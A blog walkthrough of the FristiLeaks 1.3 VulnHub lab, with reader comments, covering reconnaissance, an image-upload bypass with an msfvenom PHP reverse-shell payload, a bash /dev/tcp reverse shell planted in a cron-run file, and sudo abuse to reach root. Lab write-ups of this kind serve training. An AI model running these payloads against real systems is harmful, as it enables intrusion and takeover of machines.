So onto the next one something a touch harder this time.
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png 2x" /> <p dir="auto"><strong>Name: FristiLeaks: 1.3<br /> <strong>Date release: 14 Dec 2015 <p dir="auto"><strong>Author: Ar0xA<br /> <strong>Series: FristiLeaks<br /> <strong>Web page:<br /> <strong>Vulnhub:<br /> <strong>Description:<span> <a href="https://tldr.nu/2015/12/15/fristileaks-vm/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://tldr.nu/2015/12/15/fristileaks-vm/<span> <a href="https://www.vulnhub.com/entry/fristileaks-13,133/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://www.vulnhub.com/entry/fristileaks-13,133/ <blockquote> <p dir="auto">A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, >reverse engineering, etc..<br /> VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76 <h3>🔥HOST DISCOVERY 🔥 <p dir="auto"><strong>ARP <p dir="auto"><code>netdiscover <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png 2x" /> <p dir="auto"><strong>ping <p dir="auto"><code>ping 192.168.0.17 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png 2x" /> <h3>🔥PORT SCANNING🔥 <p dir="auto"><strong>TCP <p dir="auto"><code>nmap -sS -A -sC -sV -O -p0- 192.168.0.17 -oA nmap_tcp_full_verOSscript <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png 2x" /> <p dir="auto">hmmm http only?? <p dir="auto"><strong>UDP <p dir="auto"><code>nmap -sU -n 192.168.0.17 -oA nmap_udp_def <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png 2x" /> <p dir="auto">no udp ports <h3>🔥 SERVICE ENUMERATION 🔥 <p dir="auto"><strong>80 - http <p dir="auto"><span><a href="http://192.168.0.17" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png 2x" /> <p dir="auto">so it looks like there is a little in robots.txt <p dir="auto"><span><a href="http://192.168.0.17/robots.txt" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/robots.txt <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png 2x" /> <p dir="auto"><br /><br /><span><a href="http://192.168.0.17/cola" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/cola<span> <a href="http://192.168.0.17/sisi/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/sisi/<span> <a href="http://192.168.0.17/beer" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/beer <p dir="auto">So all three links appear to troll me displaying the image below. <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png 2x" /> <p dir="auto"><span><img src="https://images.hive.blog/768x0/http://192.168.0.17/images/3037440.jpg" srcset="https://images.hive.blog/768x0/http://192.168.0.17/images/3037440.jpg 1x, https://images.hive.blog/1536x0/http://192.168.0.17/images/3037440.jpg 2x" /> <p dir="auto"><code>nikto -h 192.168.0.17 -p 80 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png 2x" /> <p dir="auto"><code>dirb http://192.168.0.17 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png 2x" /> <p dir="auto">hmmm. Cant drink beer. Cant drink cola. Keep calm and <strong>Fristi <p dir="auto">Theres clues right under your nose sometimes. I was stuck on this for a while <p dir="auto"><span><a href="http://192.168.0.17/fristi/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/fristi/ <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png 2x" /> <p dir="auto">now we got something a login portal <p dir="auto">there are a few interesting comments i spotted in the page source <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png 2x" /> <p dir="auto">The image source suggests the wall of characters could be <strong>base64 encoded image <pre><code>(html comment removed: TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz ) (html comment removed: iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg== ) <p dir="auto">a user found <strong>eezeepz <p dir="auto">in kali we could have used the base64 tool however being lazy i pulled up the first website to decode base64 ascii <p dir="auto"><span><a href="https://www.base64decode.org/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://www.base64decode.org/ <p dir="auto">pasted in the comment which returned the following image <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png 2x" /> <p dir="auto">next I was able to successfully login to the portal using <p dir="auto">user: eezeepz<br /> password: keKkeKKeKKeKkEkkEk <p dir="auto">An upload page for us to abuse perhaps? <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png 2x" /> <p dir="auto">The upload function is restricted to images. <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png 2x" /> <h3>🔥 EXPLOITATION🔥 <p dir="auto">A quick searchsploit returns a few exploits nothing too relevant <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png 2x" /> <p dir="auto">Lets try upload a shell instead <p dir="auto">with the information enumerated I build the shell with msfvenom <p dir="auto"><code>msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f raw > shell.php.png <p dir="auto">successful upload of the payload :D <p dir="auto">before executing the payload we need to start the listener <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png 2x" /> <p dir="auto">set the payload, lhost and lport <p dir="auto">started the listener. time to execute the payload. The browser loads indefinitely... this is a good sign <p dir="auto"><span><img src="https://images.hive.blog/768x0/http://192.168.0.17/fristi/uploads/shell.php.png" srcset="https://images.hive.blog/768x0/http://192.168.0.17/fristi/uploads/shell.php.png 1x, https://images.hive.blog/1536x0/http://192.168.0.17/fristi/uploads/shell.php.png 2x" /> <p dir="auto">flick back to metasploit and BOOM we got a shell <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png 2x" /> <p dir="auto">i jump into standard shell. we are in as the <strong>apache user <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png 2x" /> <h3>🔥PRIV ESCALATION 🔥 <p dir="auto">So we now need to get root because apache just is not good enough. <p dir="auto">First i moved into a bash shell as backspace was annoying me. <p dir="auto"><code>/bin/bash <p dir="auto">This time i decided to manually go through some priv escalation commands in g0tm1lks cheat sheet. No cheating script this time <p dir="auto">looking around we start to build up info<br /><span> <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ <p dir="auto">looking around we start to build up info <pre><code>admin eezeepz fristigod Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash vboxadd:x:498:1::/var/run/vboxadd:/bin/false eezeepz:x:500:500::/home/eezeepz:/bin/bash admin:x:501:501::/home/admin:/bin/bash fristigod:x:502:502::/var/fristigod:/bin/bash fristi:x:503:100::/var/www:/sbin/nologin <p dir="auto">Eventually inside /home/eezeepz the <strong>notes.txt file contains some useful info <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png 2x" /> <p dir="auto">so we put the following code into the runthis fille to try and get the target machine to connect back to the attacking kali box on port 6666. This should be executed as admin also :P <p dir="auto"><code>echo "/usr/bin/dir && /bin/bash -i >& bash -i >& /dev/tcp/192.168.0.13/6666 0>&1" > /tmp/runthis <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png 2x" /> <p dir="auto">looking in <strong>cronresult looks like we have a hit <p dir="auto">boom we got a shell <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png 2x" /> <p dir="auto">now we are admin. not good enough :( but a step up <p dir="auto">continuing the hunt <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png 2x" /> <p dir="auto"><strong>cryptpass.py suggests the value above is base64 encoded then ROT13 encoded <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png 2x" /> <p dir="auto">after failing to get the python code to run on the target i jumped into python to reverse <p dir="auto"><strong>LetThereBeFristi! <p dir="auto">I suspected this was the password for one of the fristi users <p dir="auto">fristigod:x:502:502::/var/fristigod:/bin/bash<br /> fristi:x:503:100::/var/www:/sbin/nologin <p dir="auto">we try to swtich to <strong>fristigod <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png 2x" /> <p dir="auto">need a tty. We know python is on here so<br /><span> <a href="https://netsec.ws/?p=337" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://netsec.ws/?p=337 <p dir="auto"><code>python -c 'import pty; pty.spawn("/bin/sh")' <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png 2x" /> <p dir="auto">google is always helpful <p dir="auto">so now we successfully used the decoded string as the password for fristigod <p dir="auto">straight away we see a interesting folder.secret_admin_stuff and inside file <strong>doCom <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmUaJgg5tjDm53bVKnGRc3BSn7Ztr7YDGjPyJV3uwZhPau/image.png 2x" /> <p dir="auto">looking at the bash history reveals what fristigod has been doing <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmZc2eLNoG3JSkAY5Pyg1mGbGRNHVTVZ268t16e5exE9gw/image.png 2x" /> <p dir="auto">so looks like the command was spammed. The first one looks the most interesting where doCom runs the ls command. possibly under the context of root :O <p dir="auto"><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom whoami<br /> <code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbc3ED6wsS4a9d9bNXwTkjPesontww5sFZBnovCvhiRVy/image.png 2x" /> <p dir="auto">got root 😎😎😎 <p dir="auto">time to get the flag <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVwy3kx8RLURXBP8uxva9cQ8JfdhxqVnEBVhHExqZNwUh/image.png 2x" /> <p dir="auto">got the flag🚩 <p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmQrhw1RA9FLfua11j1Cdkgmmu6pvYLuxyM93Kvt455mQr/image.png 2x" /> <p dir="auto"><strong><span>Please follow me <a href="/@shifty0g">@shifty0g
I always enjoy a good write up. Good job and thanks for sharing!
I'm currently in the middle my eWPT exam. I plan on writing a review when I'm done. Currently writing my report. I'm bored of reporting and itching to get back to some vulnhub challenges.
good luck . Im building back to OSCP attempt 2 . templates and automation with scripts and alias' have helped me alot.
Good luck to you as well! I look forward to the oscp. Ecppt was a lot of fun.
Vulnhub has been my oscp prep for a long time now lol
this reminds me of when I went to tech school for IT, unfortunately my life took a different turn and I never went that way, but this would be cool to take on someday. might take me a few minutes to get back up to speed, who knows, maybe someday.